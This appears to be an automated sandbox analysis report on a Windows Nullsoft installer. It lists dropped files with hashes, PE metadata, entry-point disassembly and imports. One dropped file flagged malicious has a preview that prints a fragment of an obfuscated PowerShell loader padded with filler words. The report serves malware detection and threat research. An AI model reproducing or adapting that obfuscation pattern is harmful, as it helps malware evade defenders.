                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........L.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...U.Ar..~.<.[...~..U..n....G...(..*........6Q.K..........v....7\...$o@.t..y...^..>..C.~...^"..A$.p. ...... ..sK.5....N..\..........[]..J...yC...5G./.../E.1GD.6.rA.6...\.X...<.U.ir.hS.MI..#d.nR~.+...o..B.K.d..2@ ..>.....Mk...\Co..Xu..k.<.G...8...M*.}C.....R..G<w..+)8U.3\.g+7.z._.....).1..I..;pO?..'...G1.'......1..i...w....I..A....^i.?...N....'9...B..nQ.P
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 384x185, components 3
                                                                        Category:dropped
                                                                        Size (bytes):14049
                                                                        Entropy (8bit):7.91807748657587
                                                                        Encrypted:false
                                                                        SSDEEP:384:wqmHIc+9W7tPMa2+d7ubE2CwYyjyzzlpyCEysbOJbV2C:wqmocnd/aSwz2XX/sbEJD
                                                                        MD5:8AB3CA28CE62FC46C07B5B98FBBB414B
                                                                        SHA1:240E8583EFDC5A9C6D75BF7B11F262914BD04200
                                                                        SHA-256:C5A65D61DD4F44DEEDC787B8A3D6C4B09B38DC25EB93AD8FEDDA047C00C6CEA4
                                                                        SHA-512:295B01BD4821D508415FAC01E09EFA81B3CF4C73749CBD9BB58B578B26476E19CA2A08E67A11A60843CECFCE05FB5066B3DD277CC5CA0107D4283E8E992928ED
                                                                        Malicious:false
                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..F.UG95a."..XD.0....QR.)..aqO.[....y.4...F.Bf46RJ......*....?D....O...P+eJ.s.[A.0c...j.I(....Q....t.}...q.+.G.I.....U. .#.R+...8...?*.5..Jw.....>....h..z]....}*...x.B.qLjB..j..SJ..4.Pi.f...A.].......#.p.OY..U.5....jG....i..+...C.....'Y.K.Wg.kM....+......b^!..|.Kk.9FMlZ.m.....s..H.C+.e.k.......1..RH.m.EmN.R/..rWz~.%IV.1\..sy.`..].4`0.W..H.!....i%..g5<..1.j
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 384x185, components 3
                                                                        Category:dropped
                                                                        Size (bytes):13561
                                                                        Entropy (8bit):7.944486430660756
                                                                        Encrypted:false
                                                                        SSDEEP:384:wqmHIc+9W7tPMa2+d7ubE2CwYyjyzzlpyCEysbOJbVD:wqmocnd/aSwz2XX/sbEJD
                                                                        MD5:B01D2EE27691E0946A05D90BFF5738FF
                                                                        SHA1:7202B8A8FA2CB0BE12C35E1DB38B73D7EF5BE2B3
                                                                        SHA-256:99A8FF2023B2897A6521E088258EBD61EF560283D294E395A6CE4671EE0E3FA6
                                                                        SHA-512:1916D6C935EEF69CAEA32989023F337AD1D68DFFD6A2E6018DFC010E3BFA3B70A0EBCA797446C46C35BC273C91D2005A117EA35704AED9FC4BBBB75A85F6506B
                                                                        Malicious:false
                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..F.UG95a."..XD.0....QR.)..aqO.[....y.4...F.Bf46RJ......*....?D....O...P+eJ.s.[A.0c...j.I(....Q....t.}...q.+.G.I.....U. .#.R+...8...?*.5..Jw.....>....h..z]....}*...x.B.qLjB..j..SJ..4.Pi.f...A.].......#.p.OY..U.5....jG....i..+...C.....'Y.K.Wg.kM....+......b^!..|.Kk.9FMlZ.m.....s..H.C+.e.k.......1..RH.m.EmN.R/..rWz~.%IV.1\..sy.`..].4`0.W..H.!....i%..g5<..1.j
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 76x197, components 3
                                                                        Category:dropped
                                                                        Size (bytes):7274
                                                                        Entropy (8bit):7.778553745678111
                                                                        Encrypted:false
                                                                        SSDEEP:192:LXXQXQ7uxIm/3REK132D5phEiQirK5Xvctc0an:7XzuOmvyfhEE25XvJ08
                                                                        MD5:D3B67F439E3520AD4222C98CA488BFA2
                                                                        SHA1:9CE0BBE7AEA677CD022980D1237690B66BF9C380
                                                                        SHA-256:43FB0CAAFF47E62E124A73C22E07E89D6D94BC93FF2A6DDA57A2C28A1225DFFD
                                                                        SHA-512:1EC28E17F10D8A2E6412281122F84AAB26210E8A6C99A60CD34F88E2222780419B285E4CCEEE16B7CB5F1B41BC8B343B39A0D280D5A861336B731F2A240E8AEE
                                                                        Malicious:false
                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........L.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...U.Ar..~.<.[...~..U..n....G...(..*........6Q.K..........v....7\...$o@.t..y...^..>..C.~...^"..A$.p. ...... ..sK.5....N..\..........[]..J...yC...5G./.../E.1GD.6.rA.6...\.X...<.U.ir.hS.MI..#d.nR~.+...o..B.K.d..2@ ..>.....Mk...\Co..Xu..k.<.G...8...M*.}C.....R..G<w..+)8U.3\.g+7.z._.....).1..I..;pO?..'...G1.'......1..i...w....I..A....^i.?...N....'9...B..nQ.P
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 531x550, components 3
                                                                        Category:dropped
                                                                        Size (bytes):27142
                                                                        Entropy (8bit):7.937950694247041
                                                                        Encrypted:false
                                                                        SSDEEP:384:HPIGC4eyQ7QeqSad6dm8wme7yjVd/oZRLcz3jP2kjc7JKAWdylE8RcCfAhZwJ8a:HPw42hasAN7yjHQc3pA0LMDRcwJF
                                                                        MD5:541F2C5A945E473E104CB993414ACF54
                                                                        SHA1:E87A90C84328C40E059CD05F136235C1A9DDD9AE
                                                                        SHA-256:D3EFA687CCDF945CE7AE1C524BA2883057A0D00C6BF317DB5519164344188494
                                                                        SHA-512:FD5B135D735C334755763CCEE29861B68D10437938947A4E140576A3420DC73EE163FDB21A2082635848DC33F8A4614AB2BC0C1F6E9FF1EAE5FBA7E2BCA96468
                                                                        Malicious:false
                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......&...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....y..M.'8.+9lf...QI.MH.j.O.k:..c...4.n...1..k..J.H.X.'...T.......:...z..^.=."..".G..[^...c..TmR...V.L..T....q.U94.$I.T&.....[...)S..0....{......T...Z.F..;U9IiW5.)..-..5`...0?.y..l63.....hA.\m.%.aI..J..(O......P...*..f.Y&je...N.....t....PR.E0..@...=izQE0....q..)..y.S@..PX...Al6..~.?..N..O>..,........$>..$u..,..)....".r..r-H.5(....U es.i.)...4.iM%Q"R.v
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 531x550, components 3
                                                                        Category:dropped
                                                                        Size (bytes):26575
                                                                        Entropy (8bit):7.946417329290275
                                                                        Encrypted:false
                                                                        SSDEEP:384:HPIGC4eyQ7QeqSad6dm8wme7yjVd/oZRLcz3jP2kjc7JKAWdylE8RcCfAhZQ:HPw42hasAN7yjHQc3pA0LMDRcQ
                                                                        MD5:B3C9708BAAA65457A17170269A21EF71
                                                                        SHA1:F2EAE9E9F236AF8A61A17BC765FBA90A8CE393F7
                                                                        SHA-256:0652B5053D759D94FE40A67BC2FF470A250533B75570F0D0D86A759681573B3E
                                                                        SHA-512:A7B5A431FDA7F30E601806D248302ACCF73D54C73723B900E0F9152D7D8F2A15A362A55C4059DA1BF7E6C5224E6CC04EAE201BD9FC25D95B3023C9D9E49233E9
                                                                        Malicious:false
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 531x550, components 3
                                                                        Category:dropped
                                                                        Size (bytes):26001
                                                                        Entropy (8bit):7.948061981828881
                                                                        Encrypted:false
                                                                        SSDEEP:384:HPIGC4eyQ7QeqSad6dm8wme7yjVd/oZRLcz3jP2kjc7JKAWdylE8RcCfAhO:HPw42hasAN7yjHQc3pA0LMDRp
                                                                        MD5:47F9CE8203A2AF484EBF0EFB9AAC90AA
                                                                        SHA1:D696706CF587DA3AEAA852C0623EC0037CE429E8
                                                                        SHA-256:BE707A416458B30652EC5A6C36FCA438E8E3DE4341742646ECB4FDD4ED8A9947
                                                                        SHA-512:A7DC9F3D57C8D5A99F6D9827C8692A0A85FD3528BEB3D4DAC3861DF611123901FAF49A3853DE48681D72DA558262E10360A78CC4668AB638E66DB6141B05DE58
                                                                        Malicious:false
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):369267
                                                                        Entropy (8bit):1.2505498508943538
                                                                        Encrypted:false
                                                                        SSDEEP:3072:q4GegDIdTXvDmD7bAesUYZXiOcxlvD2srap7dG7kw/d+yIX2CoVN/18d1/MWmYB1:BIW+zx6PXU+
                                                                        MD5:C6FFD2E64ED2416142F50EA4046578B8
                                                                        SHA1:875FF4760B702CAA1D2AA7E1482D0468BB95850C
                                                                        SHA-256:90C089F5BBAA260A087BF1B8C5F56C14F0D3E4A369872AB1E429DB71A969B80F
                                                                        SHA-512:685D035FDBEFD3BCD3B703F6D7D5BB4FA7D242B62326052B279634DDCB7C3AD1100DF7C2730B5CCF647D0B4E43C26AB4FA97711013327204E162D7D3CEA4A6D2
                                                                        Malicious:false
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 76x197, components 3
                                                                        Category:dropped
                                                                        Size (bytes):7742
                                                                        Entropy (8bit):7.685816559459474
                                                                        Encrypted:false
                                                                        SSDEEP:192:LXXQXQ7uxIm/3REK132D5phEiQirK5Xvctc0awWk/:7XzuOmvyfhEE25XvJ0//
                                                                        MD5:CAB6C7C8AB58D902E1836D53A688CD4A
                                                                        SHA1:55C46FA98306F5E0F35B89796891CA126E52F02A
                                                                        SHA-256:82B4B8B3994B4A9D277F249AC6D2B034715DA0F5BAE309604D3BF1CA7247B4E9
                                                                        SHA-512:9115FF2B00F98109B989DDEB316D5D6F1A1509DCFA56FE8ABB75F0753DE7BE0C8CD16C978F36CA46DFF5BA0A55E67A432077A14EBAFC1446260E7B249A938A3E
                                                                        Malicious:false
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 384x185, components 3
                                                                        Category:dropped
                                                                        Size (bytes):12929
                                                                        Entropy (8bit):7.957757236123418
                                                                        Encrypted:false
                                                                        SSDEEP:384:wqmHIc+9W7tPMa2+d7ubE2CwYyjyzzlpyCEysbG:wqmocnd/aSwz2XX/sbG
                                                                        MD5:D80B9F37C8A58A34326507D15B2141F3
                                                                        SHA1:92A352F9BCF3E9231FB96F2EBCE0EEB3B28D53C3
                                                                        SHA-256:83BB4E7FFE9511AE104E48B1F9E350308AFAA12F12F8750170A7C6A956EA7238
                                                                        SHA-512:DD6CD1188BB082A1D336D0DCBEAD91B26B1EE045CD852B9CBF61DFEF11D7EC940199034C389FB30838B82EBB672622D3994409409C8A68834D3F276469E9C370
                                                                        Malicious:false
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 76x197, components 3
                                                                        Category:dropped
                                                                        Size (bytes):6748
                                                                        Entropy (8bit):7.868770137002905
                                                                        Encrypted:false
                                                                        SSDEEP:192:LXXQXQ7uxIm/3REK132D5phEiQirK5Xvctc0J:7XzuOmvyfhEE25XvJ0J
                                                                        MD5:9361066F2EAB82730A5F698F735ECF25
                                                                        SHA1:7279F63469EFC0AAF9FCF70D8ACCD623F7D5AC6B
                                                                        SHA-256:4976EE2C2C27F507B578F55C6323533DEE7B47E25877F8F51398AD34545497D0
                                                                        SHA-512:F706FB6DBD5596631AE35A2F6B8FD0D723BD46E6F646383245C470F57C2B3CEE2A82F4695E24D9E0A2F7382156EAAD4AE218443069C962B247015EC8429583EE
                                                                        Malicious:false
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 76x197, components 3
                                                                        Category:dropped
                                                                        Size (bytes):6028
                                                                        Entropy (8bit):7.934780456271549
                                                                        Encrypted:false
                                                                        SSDEEP:96:RhXE4WTXQUVsLLl9vaxwrBnNk/3REfi132Co5p7lrEik1MEirZ8Jcics9:LXXQXQ7uxIm/3REK132D5phEiQirK5X9
                                                                        MD5:F9D9FF81C5A1981E6D8D05FF64C375A3
                                                                        SHA1:A880B1EE40AF72076B8BC02BF62E89489A5481ED
                                                                        SHA-256:FA20D23F9216A071D4A75F1ED13515C02704746D091EF2B9D5C09896E5143534
                                                                        SHA-512:6D1CEA465CF4BC488C94AD875E9DE0EC4B73061CF94A2D6F200C7DA8DA472A83C2ADF6413383BAC18843BF9ED1FA5B0D633C326E82AEFCE532C8BF2512F83124
                                                                        Malicious:false
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):310172
                                                                        Entropy (8bit):7.730220826478408
                                                                        Encrypted:false
                                                                        SSDEEP:6144:vtlXxoirgTHS9GMQdWzWXWfldHMR2tWcTn6mVpJOwf0rjztxSXLyfu:VZxKS9MW6WddscQcTn66psW0DHS7yG
                                                                        MD5:C0AE77537787BD3E4FC226F700D6ABBC
                                                                        SHA1:7C51BA74161A9866CA1569257B45353F485947BB
                                                                        SHA-256:AE59AA2ADB65D3963B98EF51AB9FF0EF289CDD98C063CE9A29F375A38FD62293
                                                                        SHA-512:29525C27A856C80986392833666E70A02DE27CD95C7DA43FE022A5A0B3D2D0A8AB7CE5D8798708F20596E95282A353F57DCFED8C8F300DF58F93F7E80820D6F0
                                                                        Malicious:false
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (3155), with CRLF, LF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):52995
                                                                        Entropy (8bit):5.328813408673782
                                                                        Encrypted:false
                                                                        SSDEEP:1536:yYXWMCcIl8U2gCVnaihuyUH6bGZpufwhFz5od:/hU2g6aYs6b+pvlE
                                                                        MD5:C740FC11F250034D77CB8DCA8A40FE8F
                                                                        SHA1:9758084B008638DA2208BB32908340B6627C17AA
                                                                        SHA-256:F995D79992D17DC66BE7688AFCAD5B741C0EDDEE7A427318581091058F140D49
                                                                        SHA-512:7D302BC092D5C1518CE8606A212C5CA04E4A3DBCFD27F0B2E1617D857382312ED004373C4A5D151A07EC49E131177C7D90D4741CF9F1EF15BB201E285D2D9A6C
                                                                        Malicious:true
                                                                        Preview:$stempelafgiftsloven=$Reexcavatedrtendes;........$Semiaffectionate = @'.Gnome.C par$CivilEUdklifTthedtMultieActinrFrilgaBaronaInddrrSubtrsGaskif Madee MonarForgeiBenz.eSequarFamilnTab le CorvnForpltPreineKorpsrknaplpFrakeo unvalSkippe DivirModtaeEks.e=Kbyte$OccurE DyrbcErhveoEndomn Touro D pwmSmeltiDepresNondoiPara.nEp emgHyper;Res,r.PlowlfPeb,ruBragenLat icBaglytBronzimari oEfternBen a WagsoPSpicerPiratgAkantnDawt iSpagenhulspgUnsexeL ghtrTambos Delg Pla f( Tawp$No arR langeRhi.oeHjforxRske cadornaAand vKaldea SkabtFortye Hoerd Skel, Epit$SkrabNTarifa.athinOverliTegntt ThuniOpusccQueb.)Brne. nde{ Poc..Assis.P,eud$BefamCG,lfwaKrydst ThrarRepr iDampioStundnNeoloaNs nesTeste agel(potteO edstvLunkheHall rUnporgOverta Cardv Disc Ti.l'Bankr Gu.rTSp,yrh Baroe LyseoTyve,$roansPAs neoKnipspNuptio AtomvGrejeR Koka Sin,wtAgg,urbrsbyoAu.icsAfviseRedeyd M lieSha ltSt.mnr Sto,oSynaeeOphid nate.iffelKonf.fUdflus Tilbx Til K A staStorm.Stirps Tatte PenscRegin S udgDForhaisympt,BuskmsHenfaaMen
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):55
                                                                        Entropy (8bit):4.306461250274409
                                                                        Encrypted:false
                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                        Malicious:false
                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                        Entropy (8bit):7.596359760786588
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:GyGE2VaBFL.exe
                                                                        File size:791'053 bytes
                                                                        MD5:d8eacf83ca07943696bf5e23528cc348
                                                                        SHA1:1aa708342f955f268f43cbd7705dc1497cf91d46
                                                                        SHA256:0a494235e29b9a51ba2120377cbc09ae119c0e6eda64072218343e69c85d1783
                                                                        SHA512:72d24f737152a33fb7b9bb38b4dc9886711f8a1cd4089021aa08482db193221359cac6836f63362994e988f02788e00dcb0a836c0387df19f04bb557561f8fec
                                                                        SSDEEP:12288:2tlyuHaQfKR13fxFozNXofFxNc3pipkyfGSw:AbQRdpAiF3c5yfFw
                                                                        TLSH:4EF4F165AB69CD03E3C205B0C5B7D3B967788E54163F82228BD1BE5BF97CBE10D19212
                                                                        Icon Hash:49c5e9ec6d5d8413
                                                                        Entrypoint:0x403325
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x60FC909C [Sat Jul 24 22:13:48 2021 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:ced282d9b261d1462772017fe2f6972b
                                                                        Instruction
                                                                        sub esp, 00000184h
                                                                        push ebx
                                                                        push esi
                                                                        push edi
                                                                        xor ebx, ebx
                                                                        push 00008001h
                                                                        mov dword ptr [esp+18h], ebx
                                                                        mov dword ptr [esp+10h], 0040A198h
                                                                        mov dword ptr [esp+20h], ebx
                                                                        mov byte ptr [esp+14h], 00000020h
                                                                        call dword ptr [004080B8h]
                                                                        call dword ptr [004080BCh]
                                                                        and eax, BFFFFFFFh
                                                                        cmp ax, 00000006h
                                                                        mov dword ptr [007A2F6Ch], eax
                                                                        je 00007F793CF5EFB3h
                                                                        push ebx
                                                                        call 00007F793CF62116h
                                                                        cmp eax, ebx
                                                                        je 00007F793CF5EFA9h
                                                                        push 00000C00h
                                                                        call eax
                                                                        mov esi, 004082A0h
push esi
call 00007F793CF62092h
push esi
call dword ptr [004080CCh]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F793CF5EF8Dh
push 0000000Bh
call 00007F793CF620EAh
push 00000009h
call 00007F793CF620E3h
push 00000007h
mov dword ptr [007A2F64h], eax
call 00007F793CF620D7h
cmp eax, ebx
je 00007F793CF5EFB1h
push 0000001Eh
call eax
test eax, eax
je 00007F793CF5EFA9h
or byte ptr [007A2F6Fh], 00000040h
push ebp
call dword ptr [00408038h]
push ebx
call dword ptr [00408288h]
mov dword ptr [007A3038h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0079E528h
call dword ptr [0040816Ch]
push 0040A188h

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8438 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3b3000 | 0x2a768 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x29c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6230 | 0x6400 | 1ac97b0b8e41e1ffbb716878bb5109f2 | False | 0.6699609375 | data | 6.441889952551939 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1274 | 0x1400 | b8e42f3d3b81b0e2a4080ab31bc2d1f4 | False | 0.4337890625 | data | 5.061067348371254 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x399078 | 0x600 | be2892f1b11a971e0c6c4e83000268f5 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x3a4000 | 0xf000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3b3000 | 0x2a768 | 0x2a800 | 0cb6c80894f545860470303df9b92eb7 | False | 0.3268037683823529 | data | 4.893333095662434 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3b3400 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.2678782680705075
RT_ICON | 0x3c3c28 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.3491959217994534
RT_ICON | 0x3cd0d0 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.36455637707948246
RT_ICON | 0x3d2558 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.3328412848370335
RT_ICON | 0x3d6780 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.41068464730290455
RT_ICON | 0x3d8d28 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4584896810506567
RT_ICON | 0x3d9dd0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.5255863539445629
RT_ICON | 0x3dac78 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5389344262295082
RT_ICON | 0x3db600 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.5577617328519856
RT_ICON | 0x3dbea8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.5011520737327189
RT_ICON | 0x3dc570 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.375
RT_ICON | 0x3dcad8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5868794326241135
RT_DIALOG | 0x3dcf40 | 0x120 | data | English | United States | 0.53125
RT_DIALOG | 0x3dd060 | 0x120 | data | English | United States | 0.5138888888888888
RT_DIALOG | 0x3dd180 | 0xf8 | data | English | United States | 0.6330645161290323
RT_DIALOG | 0x3dd278 | 0xa0 | data | English | United States | 0.6125
RT_DIALOG | 0x3dd318 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x3dd378 | 0xae | data | English | United States | 0.6609195402298851
RT_MANIFEST | 0x3dd428 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
ADVAPI32.dll | RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll | SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll | IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
